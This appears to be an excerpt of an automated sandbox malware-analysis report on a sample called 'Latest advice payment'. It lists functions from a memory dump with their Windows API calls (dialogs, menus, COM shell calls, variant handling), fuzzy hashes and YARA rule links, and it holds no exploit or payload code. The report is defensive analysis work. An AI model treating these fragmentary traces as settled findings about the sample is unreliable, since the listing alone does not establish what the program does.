                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 005C4FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005C4FEC
                                                            • SetActiveWindow.USER32 ref: 005C500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005C5019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 005C5038
                                                            • Sleep.KERNEL32(000000FA), ref: 005C5043
                                                            • IsWindow.USER32 ref: 005C504F
                                                            • EndDialog.USER32(00000000), ref: 005C5060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: b344bde32fc7535e43fe689ac45bf13b48982661e0d8626573fddc6b444a9163
                                                            • Instruction ID: 61e6d38f94bf41916d82e05835be553bc8f67768d28cf10580075570551eb0ce
                                                            • Opcode Fuzzy Hash: b344bde32fc7535e43fe689ac45bf13b48982661e0d8626573fddc6b444a9163
                                                            • Instruction Fuzzy Hash: 6D219270200A45AFE7245FA0ECC8F263F6AFB65745B04202CF542A52B1DF715E49AB61
                                                            Function 005CD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • CoInitialize.OLE32(00000000), ref: 005CD5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005CD67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 005CD691
                                                            • CoCreateInstance.OLE32(005F2D7C,00000000,00000001,00618C1C,?), ref: 005CD6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005CD74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 005CD7A4
                                                            • _memset.LIBCMT ref: 005CD7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 005CD81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005CD840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 005CD847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005CD87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 005CD880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: 9bda8e7a10a483e89d2a790c4904d0cdcab4c6d0642981d5aea7f8c171330616
                                                            • Instruction ID: b73f2a5ebffc0d47b49e047f4883d504a847bf4f347d59229bfcc649fd596a95
                                                            • Opcode Fuzzy Hash: 9bda8e7a10a483e89d2a790c4904d0cdcab4c6d0642981d5aea7f8c171330616
                                                            • Instruction Fuzzy Hash: 2FB1BD75A00119AFDB14DFA4C888EAEBBF9FF88314B148469F905DB261DB30ED45CB50
                                                            Function 005BC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 005BC283
                                                            • GetWindowRect.USER32(00000000,?), ref: 005BC295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005BC2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 005BC2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 005BC310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005BC364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 005BC372
                                                            • GetWindowRect.USER32(00000000,?), ref: 005BC383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005BC3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 005BC3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005BC3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 005BC3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 12ddbb53cd42c75d798d63b37e094b40be81bad5e976309d016f265644a6796f
                                                            • Instruction ID: 1272f28dccdd675abf6045095a97f732f83752037713d47a7d50968a8fc770e6
                                                            • Opcode Fuzzy Hash: 12ddbb53cd42c75d798d63b37e094b40be81bad5e976309d016f265644a6796f
                                                            • Instruction Fuzzy Hash: 89514E71B00205ABDB18CFA9DD99AAEBBBAFB98310F14852DF515D6290DB70AD048B14
                                                            Function 0056201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00561B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00562036,?,00000000,?,?,?,?,005616CB,00000000,?), ref: 00561B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005620D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0056216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0059BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 0059BD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: f77c5e0e37769a3f7cb62ed832d3b61b0ffbf48123b5fdc6b953b408e0f74381
                                                            • Instruction ID: c06133b03b0ededea3d9a429dc9cb3b57acebd46a79ac23a20d0e3c690b7b0a1
                                                            • Opcode Fuzzy Hash: f77c5e0e37769a3f7cb62ed832d3b61b0ffbf48123b5fdc6b953b408e0f74381
                                                            • Instruction Fuzzy Hash: 7D617B30505E51DFEB399F14EA88B297BF2FB50312F109929E5839B960CBB4A891DB50
                                                            Function 005621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
                                                            • GetSysColor.USER32(0000000F), ref: 005621D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 498259ab13bf98dd57d40d270026a95991c3b82499dae5806d3100fb193e021d
                                                            • Instruction ID: 2288cfb6f6422e36592ae688cd3e44f69dc2b03a49adb64c8ea71c7c752d5060
                                                            • Opcode Fuzzy Hash: 498259ab13bf98dd57d40d270026a95991c3b82499dae5806d3100fb193e021d
                                                            • Instruction Fuzzy Hash: DF4171350049449BEB295F28EC98BB93F66FB56321F148265FEA58F1E1CB318D42DB11
                                                            Function 005CA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,005EF910), ref: 005CA90B
                                                            • GetDriveTypeW.KERNEL32(00000061,006189A0,00000061), ref: 005CA9D5
                                                            • _wcscpy.LIBCMT ref: 005CA9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 365f2640748ad55411e11d1781fdff9283525e8f55afea514efbff4cf0dae48d
                                                            • Instruction ID: 2507ae1c5dff49bfd573fcd19c0d201fb284d8631d817a6188130e4da0db1068
                                                            • Opcode Fuzzy Hash: 365f2640748ad55411e11d1781fdff9283525e8f55afea514efbff4cf0dae48d
                                                            • Instruction Fuzzy Hash: E3516A351183069FC314EF54C896EAEBFA9BFC4348F14482DF896572A2DB319949CB93
                                                            Function 00569837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: ecf1eca6d80da85c8cae446cc7aa854324bf6303e95c6703a7f3bfc50809fcba
                                                            • Instruction ID: d313d2945ad5deb7e6e64cbe34e8e4a10ff4126553eea88e73ab9e35afe75743
                                                            • Opcode Fuzzy Hash: ecf1eca6d80da85c8cae446cc7aa854324bf6303e95c6703a7f3bfc50809fcba
                                                            • Instruction Fuzzy Hash: 4641B371504206AFEF24EF74D846E7A7FE8FF45310F24486EE949DB292EA719942CB10
                                                            Function 005E7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005E716A
                                                            • CreateMenu.USER32 ref: 005E7185
                                                            • SetMenu.USER32(?,00000000), ref: 005E7194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E7221
                                                            • IsMenu.USER32(?), ref: 005E7237
                                                            • CreatePopupMenu.USER32 ref: 005E7241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005E726E
                                                            • DrawMenuBar.USER32 ref: 005E7276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: ed72acc5c0d24012280e19439c829954db9845432dca7629ba79cedc8e4fd222
                                                            • Instruction ID: 0af505c3c7a2e85cbe1e79e826ca3e09487315b9df5d91af68acb9e0de3eab60
                                                            • Opcode Fuzzy Hash: ed72acc5c0d24012280e19439c829954db9845432dca7629ba79cedc8e4fd222
                                                            • Instruction Fuzzy Hash: 78418C78A01249EFDB24DF65E884E9A7BF5FF58300F144069FA85A7350D731A914DF90
                                                            Function 005E74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005E755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 005E7565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005E7578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 005E7580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 005E758B
                                                            • DeleteDC.GDI32(00000000), ref: 005E7594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005E759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005E75B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005E75BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 02b8a091f86922a7d74d23991baee0cb7495b43a103ccab7047becd5e5f86765
                                                            • Instruction ID: 64ef3ce6cd87a37d8d2d760111141a30c0cf5e6fd83771871e0289c3f402aec5
                                                            • Opcode Fuzzy Hash: 02b8a091f86922a7d74d23991baee0cb7495b43a103ccab7047becd5e5f86765
                                                            • Instruction Fuzzy Hash: 1A317A32105299ABDF199F65DC48FEA3F69FF1D320F100225FA95960A0CB31D811EBA4
                                                            Function 00586E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00586E3E
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • __gmtime64_s.LIBCMT ref: 00586ED7
                                                            • __gmtime64_s.LIBCMT ref: 00586F0D
                                                            • __gmtime64_s.LIBCMT ref: 00586F2A
                                                            • __allrem.LIBCMT ref: 00586F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00586F9C
                                                            • __allrem.LIBCMT ref: 00586FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00586FD1
                                                            • __allrem.LIBCMT ref: 00586FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00587006
                                                            • __invoke_watson.LIBCMT ref: 00587077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 20d9d3b83df81592d4567fc2a188a8d3327b7c9d0faa5f0f6e1e87faf3da4124
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: C471E576A00717EBDB14BE68DC45B6BBBA8BF44364F144629F914F7281E770ED408B90
                                                            Function 005C2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2542
                                                            • GetMenuItemInfoW.USER32(00625890,000000FF,00000000,00000030), ref: 005C25A3
                                                            • SetMenuItemInfoW.USER32(00625890,00000004,00000000,00000030), ref: 005C25D9
                                                            • Sleep.KERNEL32(000001F4), ref: 005C25EB
                                                            • GetMenuItemCount.USER32(?), ref: 005C262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 005C264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 005C2675
                                                            • GetMenuItemID.USER32(?,?), ref: 005C26BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005C2700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C2714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C2735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 5e994f0c8e24e387f46a4db9a161fc9ded6f5d5fee7966221a0549d662fc17c9
                                                            • Instruction ID: 528d033b7a1cd17c25086bcdc61c09cdb41ab9b0ea18184f7f26cd5ed1e6a2f9
                                                            • Opcode Fuzzy Hash: 5e994f0c8e24e387f46a4db9a161fc9ded6f5d5fee7966221a0549d662fc17c9
                                                            • Instruction Fuzzy Hash: 15617BB4900249AFDB21CFA4CC88EAE7FB9FB55344F14046DE842A7291DB31AE45DB21
                                                            Function 005E6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005E6FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005E6FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005E6FCC
                                                            • _memset.LIBCMT ref: 005E6FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005E6FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005E7067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: da76f7dc68e77af58d9ccfc3764c587ef279170e57d59b9b413ef6abe853a732
                                                            • Instruction ID: 350a02d6bed860346f53cb5c6d79dea473cd85d64c6199a09539eb11c3d514c8
                                                            • Opcode Fuzzy Hash: da76f7dc68e77af58d9ccfc3764c587ef279170e57d59b9b413ef6abe853a732
                                                            • Instruction Fuzzy Hash: EB618B75900298AFDB24DFA4CC85EEE7BB9FB48700F100159FA55EB2A1C771AD41DB90
                                                            Function 005B6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005B6BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 005B6C18
                                                            • VariantInit.OLEAUT32(?), ref: 005B6C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 005B6C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 005B6C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 005B6CB1
                                                            • VariantClear.OLEAUT32(?), ref: 005B6CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 005B6CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B6CDC
                                                            • VariantClear.OLEAUT32(?), ref: 005B6CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B6CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 0250a8e15d2519abfb0d3e5fe71ed916044362b9c79808e18243b6f5e4e1d11f
                                                            • Instruction ID: ca608b4db2ed59c32d3c5efa64a4a839fa8f6ed4ba4c74827662e5ec70e0b53a
                                                            • Opcode Fuzzy Hash: 0250a8e15d2519abfb0d3e5fe71ed916044362b9c79808e18243b6f5e4e1d11f
                                                            • Instruction Fuzzy Hash: 4541427590011A9FDF04DF64D888DEEBFB9FF58350F008069E995AB261CB34A949DB90
                                                            Function 005D83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • CoInitialize.OLE32 ref: 005D8403
                                                            • CoUninitialize.OLE32 ref: 005D840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,005F2BEC,?), ref: 005D846E
                                                            • IIDFromString.OLE32(?,?), ref: 005D84E1
                                                            • VariantInit.OLEAUT32(?), ref: 005D857B
                                                            • VariantClear.OLEAUT32(?), ref: 005D85DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
